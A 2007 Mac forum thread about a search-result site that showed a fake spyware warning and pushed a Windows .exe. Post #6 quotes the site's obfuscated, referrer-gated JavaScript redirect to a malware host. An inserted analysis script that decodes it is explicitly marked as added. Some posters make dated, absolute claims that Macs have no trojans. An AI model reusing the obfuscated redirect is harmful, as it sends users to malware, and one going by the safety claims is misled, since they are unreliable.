Windows spyware and Safari

Discussion in 'macOS' started by Schtibbie, Aug 21, 2007.

  1. Schtibbie macrumors 6502

    Joined:
    Jan 13, 2007
    #1
    So my wife tells me she was surfing the web on Safari (Mac OS) the other day and clicked on a Google search result page and got an *uncloseable* window that popped up saying "You have spyware" and a file suddenly appeared on the desktop. She tells me it was an .exe file, which means really this is a non-issue since this isn't a Windows machine.

    But I'd like to know - how did this happen in Safari? How was the window made uncloseable? How was a file made to download spontaneously? And does that (by itself) even pose a potential risk?

    Very sorry I don't have the URL for the site right now, but I'll try to recover it from her history later tonight and repost if I can.
     
  2. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #2
    I can speculate a lot, but most likely it's an ad generated by JavaScript in the page, which is a normal annoyance on the internet. No big deal.

    However, the file on the desktop with the *.exe extension should not be happening. That would be a potential security threat.

    I still need the URL to confirm.

    I think Firefox has better pop-up control, which should prevent the first event. As for automatically downloading an *.exe to the desktop, I'm puzzled as to why Safari would do such a thing at all.

    Un-closable windows: if she means clicking the close button will close the current window, but a new window will open right away, then it's a JavaScript trick. If she means clicking the close button has absolutely no effect, that would be a strange case; I can only guess it's a random system glitch that is not a big problem.
     
  3. scaredpoet macrumors 604

    scaredpoet

    Joined:
    Apr 6, 2007
    #3
    I would bet you that the window wasn't "uncloseable" at all, but was made to look like a dialog box with an "ok" button on it when in fact clicking on the "ok" button just takes you to whatever malware they want you to download and install. This is very common among unsavory malware vendors, and when such odd messages pop up, you have to very carefully look for visual cues that give it away as an ad rather than a dialog box.
     
  4. mozmac macrumors 6502

    mozmac

    Joined:
    Apr 28, 2005
    Location:
    Austin, TX
    #4
    You know, every once in a while, I'll be surfing the net (sorry, can't remember if it's Firefox or Safari on Windows, I use both simultaneously) and I'll get system messages asking if I want to download a .exe file. So weird, 'cause I haven't even clicked on anything and it's usually when I'm using one of Google's sites. I have no idea what it is, and don't feel like clicking Ok to find out.
     
  5. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #5
    Hovering the mouse over some object in the page can trigger the JavaScript.

    Asking you to download is no big deal, because you are in control.

    Not asking you is a serious problem, 'cause you are NOT in control.
     
  6. Schtibbie thread starter macrumors 6502

    Joined:
    Jan 13, 2007
    #6
    I found the website if anyone wants to look at it.

    http://lyfammaapjzl.cn/1070.html

    Found by searching Google for Graco baby products. IF you hit the site through Google, the spyware runs:

    It contains the following javascript:

    if(top.document.referrer.indexOf("google") != -1 && top.document.referrer.indexOf("search") != -1 && top.document.referrer.indexOf("=") != -1 && top.document.referrer.indexOf("?") != -1 && top.document.referrer.indexOf("site:") == -1 && top.document.referrer.indexOf("site%3A") == -1 && top.document.referrer.indexOf("inurl:") == -1 && top.document.referrer.indexOf("inurl%3A") == -1)
    {
    var upis1='http://scanner.s';
    var upis2='py-shredder';
    var upis3='.com/5/?advid=1487';
    var piska00="win";
    var piska01="dow.";
    var piska02="loca";
    var piska03="tion='";
    var piska1="'";
    eval(piska00+piska01+piska02+piska03+upis1+upis2+upis3+piska1);
    }
     
  7. Makosuke macrumors 603

    Joined:
    Aug 15, 2001
    Location:
    The Cool Part of CA, USA
    #7
    What that Javascript does, in essence, is if you're coming in from Google send you to this URL:

    http://scanner.spy-shredder.com/5/?advid=1487

    (Note: That is a garbage malware site, so beware clicking if you're on Windows).

    What the site does is throw up a simulated "malware scan" or some such (nice artificial progress bars). When it "finishes", it does two things: One, downloads a small .exe (which I assume is a virus or other malware), and two, throws up a graphic within the window that looks like an XP-themed popup window. In reality it's just some Javascript, and when you click the fake close button it warns you. It tries to get you to click and then go through the "install" process, which of course bypasses any security in the process of installing their malware.

    When I tried it in Camino, it did download the .exe without warning or user input, as far as I could tell, but if I just cancelled the bogus "error" popup it would actually close the fake "window" easily enough.

    Safari (v3 beta on Mac) did the same, but didn't try to download the .exe until I clicked on something, at which point it gave the standard "this may contain an executable--are you sure you want to download it?" error. I clicked cancel, and it didn't. So that appeared to work as it's supposed to.

    So far as I can tell there's nothing unusual about this--Safari behaves how it should when a bit of code tells it to download a file, and no "unclosable" window results--just some garbage fake popup windows that are really just javascript.

    Oh, and the second time you go to that URL, you get a different page, so it's different after the first try.
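
What post #7 describes, reproduced by static analysis instead of by visiting the page (an added example, not part of the original thread): it takes the snippet quoted in post #6 as a string, rebuilds the argument the script passes to eval() from its string variables, and lists the referrer substrings the script requires and excludes. The function names are invented for this example, and only `var` string-literal assignments joined with `+` are handled.

```javascript
// Added example: static analysis only; SAMPLE (from post #6) is never executed.
const SAMPLE = `
if(top.document.referrer.indexOf("google") != -1 && top.document.referrer.indexOf("search") != -1 && top.document.referrer.indexOf("=") != -1 && top.document.referrer.indexOf("?") != -1 && top.document.referrer.indexOf("site:") == -1 && top.document.referrer.indexOf("site%3A") == -1 && top.document.referrer.indexOf("inurl:") == -1 && top.document.referrer.indexOf("inurl%3A") == -1)
{
var upis1='http://scanner.s';
var upis2='py-shredder';
var upis3='.com/5/?advid=1487';
var piska00="win";
var piska01="dow.";
var piska02="loca";
var piska03="tion='";
var piska1="'";
eval(piska00+piska01+piska02+piska03+upis1+upis2+upis3+piska1);
}`;

// Map each `var name = "literal";` to its string value.
function collectStringVars(src) {
  const vars = new Map();
  const re = /\bvar\s+([A-Za-z_$][\w$]*)\s*=\s*(["'])((?:(?!\2).)*)\2\s*;/g;
  for (const m of src.matchAll(re)) vars.set(m[1], m[3]);
  return vars;
}

// Rebuild the string passed to each eval() when it is a pure a+b+c chain
// of known variables; anything else is reported as unresolved.
function resolveEvals(src) {
  const vars = collectStringVars(src);
  return [...src.matchAll(/\beval\s*\(([^()]*)\)/g)].map((m) => {
    const parts = m[1].split('+').map((p) => p.trim());
    const unresolved = parts.filter((p) => !vars.has(p));
    const code = unresolved.length ? null : parts.map((p) => vars.get(p)).join('');
    return { code, unresolved };
  });
}

// Extract the referrer substrings the script requires or excludes.
function referrerGate(src) {
  const gate = { mustContain: [], mustNotContain: [] };
  const re = /referrer\.indexOf\((["'])(.*?)\1\)\s*(!=|==)=?\s*-1/g;
  for (const m of src.matchAll(re)) {
    (m[3] === '!=' ? gate.mustContain : gate.mustNotContain).push(m[2]);
  }
  return gate;
}

function analyze(src) {
  const evals = resolveEvals(src);
  const assign = /\blocation(?:\.href)?\s*=\s*(["'])(.*?)\1/;
  const redirects = evals.map((e) => e.code && e.code.match(assign))
    .filter(Boolean).map((m) => m[2]);
  return { gate: referrerGate(src), evals, redirects };
}

console.log(JSON.stringify(analyze(SAMPLE), null, 2));
```

The excluded substrings (`site:`, `inurl:` and their URL-encoded forms) are Google search operators, so the redirect is gated to fire for ordinary searches and stay silent for operator queries.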
     
  8. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #8
    If you are using a Mac, it makes precious little difference if you download the *.exe files or not. These are Windows code and cannot run on the Mac.
     
  9. Blubbert macrumors 6502

    Joined:
    Nov 1, 2006
    #9
    It makes a serious difference if the .exe is downloaded automatically. That would be a major security vulnerability for Safari. If files are just downloaded arbitrarily, there is a possibility that the next time it might not be a .exe file but a malicious script or piece of code that could affect your Mac in some way.
     
  10. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #10
    That's a very big "if." I have never seen anything download automatically via Safari.

    Your argument is not that the .exe file is dangerous in and of itself, but that dealing with it makes users less diligent about other threats. This is a whole other issue that deserves serious discussion.
     
  11. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #11
    What if next time it's a Mac trojan or Mac worm?

    You can say "if" is not "certain", but I think if we put aside the reality of possibility, there is no risk we need to talk about anymore.
     
  12. dejo Moderator

    dejo

    Staff Member

    Joined:
    Sep 2, 2004
    Location:
    The Centennial State
    #12
    I'm curious how this might be different then, say, the Download link on a site like versiontracker.com, whereby you are directed to a new page but the download starts automatically as well.

    On a side note, Apple needs to make Safari's "Open 'safe' files after downloading" preference be turned off by default.
     
  13. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #13
    Apple also needs to give an option (better by default) to "ask users where to save the download"; this will surely make users aware of any download that's about to happen.
     
  14. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #14
    There are no Mac trojans or worms.
     
  15. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #15
    I admire your absolute Apple-fan-style statement.

    May I further ask, is there any chance there will be a Mac trojan tomorrow? The day after tomorrow, 2008, 2009? (Not saying there are no Mac trojans now, but I need to dig up some evidence before making a statement.)

    Or also, how about spyware, adware, and other malware?
     
  16. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #16
    There have been precious few Mac viruses since System 6/7. Except for the occasional Microsoft Office macrovirus, virtually none on MacOS 8 or MacOS 9. There have been absolutely zero viruses on any version of MacOS X, which has been out since like 2001. That is what, six years? So yes, I like the odds of being virus-free tomorrow, next year, and the year after that.
     
  17. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #17
    Please, you can't just ignore those security patches, can you? How many of them has Apple issued this year up to now? If you count the patches for Windows, how many Vista viruses are now in the wild?

    You sure can blame M$ for Office macro viruses, but when a user gets one while working under OSX, it's an OSX virus.

    OS8, OS9: be realistic, who is still writing viruses, trojans, worms for an OS that has virtually no market share?

    Users' practical safety is much more important than a flat statement. If there is a chance users get hurt, fix it.
     
  18. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #18
     
  19. kolax macrumors G3

    Joined:
    Mar 20, 2007
  20. Blubbert macrumors 6502

    Joined:
    Nov 1, 2006
    #20
    The fact that there are no OSX viruses yet doesn't in any way decrease the chance that there might be one, or several, tomorrow or a few years down the road. The "there weren't and there still aren't any Mac viruses" stance is what makes a potential Mac virus ever more dangerous. The lax stance most users take with security, placated by that mantra, is a major security hole no company can fix. The fact is that most OSX users are practicing, to use a metaphor, unsafe sex. Just because none got an STD just yet doesn't mean that they won't get something in the future. Good luck with Halle ;).
     
  21. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #21
    There is something called "due diligence." There is also "undue diligence." This would be akin to installing burglar alarms on every door and window of your bungalow on your private South Seas island. There is a third category, "undue but necessary diligence." This is akin to having to buy all those alarms because your relatives will steal all of your stuff if you don't.

    The best predictor of the future is the past. If something never happened in the past, it is likely that it will never happen in the future. I find it ironic that people here allow their imaginations to run wild over imaginary threats. Yet, on Windows it is becoming increasingly difficult to distinguish between the "good guys" and the "bad guys," but the "good guys" are at fault. Earlier this week, HP's web site forced me to download an ActiveX control in order to download a print driver. This was totally unnecessary. In a previous post, concern was expressed about the possible security relaxation as a result of downloading innocuous Windows malware. Yet, ActiveX is one of the most dangerous technologies ever invented, HP forces it on its customers, and the Windows fan boys say nothing. Yet they whine about imaginary MacOS X viruses. Go figure :rolleyes:
     
  22. Blubbert macrumors 6502

    Joined:
    Nov 1, 2006
    #22
    Please, do not confuse me for a Windows fanboy; in no way am I saying that Windows is better than OSX. Hell, with the amount of viruses and malware available for that OS it's a miracle things get done.
    The fact that worries me most about OSX is that it lulls the users into an overwhelming sense of security. It is not "undue diligence", as you called it, to practice good safety while using your computer. The fact that a lot of Mac users have no regard for safety is a major problem. If and when the day comes when the first Mac virus is written, the odds are that it will spread like wildfire through the community because of their bad security practices.
    To use a more real-life example, I have never had my car stolen, yet I still lock it every time I leave it. The fact that it was never stolen before doesn't mean it won't be stolen this time, but the locked door could be enough of a deterrent for a thief. It is easier to find an unlocked door than to bother with a locked one. Locking your car door and using your brain while using the computer are not "undue diligence", they simply make sense.
     
  23. MisterMe macrumors G4

    MisterMe

    Joined:
    Jul 17, 2002
    Location:
    USA
    #23
    No, it is not a "major problem," it is a potential problem. Nonexistent problems cannot be considered to be major when real problems like media failures and power surges do real damage that costs real money.

    That's a very big if, but it will not have the consequences that you predict. First off, the patches from Apple that so many here make such a big thing about reduce the number of potentially exploitable vulnerabilities. There are currently zero MacOS X viruses. With the number of vulnerabilities decreasing, the chances that an undiscovered vulnerability will be found before it is fixed is also decreasing. Any prospective MacOS X virus writer is banging his head against a wall that the masons are building longer, wider, and thicker.

    The notion that a MacOS X virus can spread like wildfire is fanciful. Apps downloaded to MacOS X do not run automatically. Every new account barrier crossed needs user permission, usually from a user with administrative privileges. There are just too many firebreaks in the system, even in the most unlikely event of gross negligence, for viruses or other malware to travel faster than word of its existence.

    Then there are some issues that most people who discuss this don't like to talk about--the true responsibility for malware. Malware is so prevalent on Windows because Microsoft designed it that way. The communities that developed around that platform routinely engage in behavior that is inherently insecure. Users have some responsibility. Microsoft has major responsibility. But, the community of Windows software developers and hardware vendors are also major culprits. In an earlier post, I mentioned HP's website requiring that my Windows computer download an ActiveX control in order to download a printer driver. I have three Dells which are used by a group which I cannot police. Those Dells have a lot of crap on them. But, most of the crap was installed by Dell!

    If you are a Windows user who is plagued by malware, you can cut your exposure by 100% by switching to MacOS X. There is nothing in life more certain than that. Is some diligence called for after you make the switch? Yes, but not the same level required under Windows. Think about how your life would change if you moved from Baghdad to Bar Harbor. Would you want to live in Bar Harbor like you did in Baghdad? Would it be necessary? Of course it would not be. You take certain obvious precautions, but you lead a different happier life.

    Like the Bar Harbor transfer from Baghdad, the MacOS X user can afford to lead a different computer life than the Windows user. I certainly do. If I have any hope of making a go of it with Halle, I have things other than Mac viruses to worry about.
     
  24. jasonnorm macrumors regular

    jasonnorm

    Joined:
    Aug 10, 2007
    Location:
    Milford, MA
    #24
    I just tried this on a Windows XP system using Safari (beta 3). Yes I'm brave :) lol

    Well, no file was "automatically" downloaded so obviously user interaction was required. Closing the window with the fake close button or selecting ignore etc. will initiate the download. Simply closing the window with "Windows (or Command) - W" closed the pop-up without any problems.

    Remember... Command (or Windows) W is your friend :)
     
  25. clevin macrumors G3

    clevin

    Joined:
    Aug 6, 2006
    #25
    I'm interested in where you get those numbers that there are now more people writing viruses for OS Classic than OSX. Better not be a case like 90 vs 89, with all of them part-time.
    There is no logic like this in the virus industry. Apple patching one security hole here doesn't mean there is no hole elsewhere, and there is no guarantee their patch will not introduce new holes. The virus industry isn't as simple as you might suggest, and this is not math, 1-1=0.
    Safari runs "safe download" automatically by default. If the OP's listed case is real, Safari will automatically download something and then run it automatically. I doubt anybody would like that.
    Yes, it's a trade-off: for system speed, M$ allows users to control deep-level hardware, which is a security threat. I just felt your example was a bit odd. In your experience, you need ActiveX to download an HP printer driver? I'm sure you can do it w/o ActiveX in Firefox.

    If by malware you mean crap installed through ActiveX, then Firefox solves it. And there is other malware.
    I don't think your assertion of 100% is helpful.

    I guess the difference is I think users need to be cautious about security threats, and you think OSX is safe enough that users don't need to worry about it, now or in the future, which I can't agree with.

    You can save the energy if you just want to suggest that currently there is no virus (strictly defined, not including trojans, worms or malware) for OSX, which I agree with.

    Eventually, after much talk, nobody likes their browser downloading stuff to the HDD without being asked.
     
